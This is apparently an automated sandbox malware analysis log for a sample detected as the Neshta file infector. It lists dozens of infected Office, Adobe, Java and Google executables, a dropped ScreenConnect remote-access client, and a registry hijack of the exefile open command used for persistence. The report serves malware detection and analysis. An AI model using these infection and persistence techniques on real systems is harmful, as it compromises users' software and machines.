                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIFE41.tmpJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Core.dllJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDF2.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Windows.dllJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1045.tmpJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI11DE.tmpJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDF2.tmpJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI13D3.tmpJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFE7.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Windows\svchost.comJump to dropped file

                          Boot Survival:

                          barindex
                          Yara detected NeshtaShow sources
                          Source: Yara matchFile source: $RUX313H.exe, type: SAMPLE
                          Source: Yara matchFile source: 2.2.svchost.com.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.$RUX313H.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.$RUX313H.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.svchost.com.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: $RUX313H.exe PID: 6336, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPED
                          Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\svchost.com, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED
                          Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                          Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe, type: DROPPED
                          Creates an undocumented autostart registry key Show sources
                          Source: C:\Users\user\Desktop\$RUX313H.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULLJump to behavior
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeCode function: 9_2_003F1880 StartServiceCtrlDispatcherW,VariantInit,OpenSCManagerW,OpenServiceW,GetCommandLineW,CreateServiceW,RegOpenKeyW,RegOpenKeyW,RegOpenKeyW,RegCreateKeyW,RegSetValueExW,QueryServiceStatus,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,VariantClear,VariantClear,9_2_003F1880
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_00DF1AD7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00DF1AD7
                          Source: C:\Users\user\Desktop\$RUX313H.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
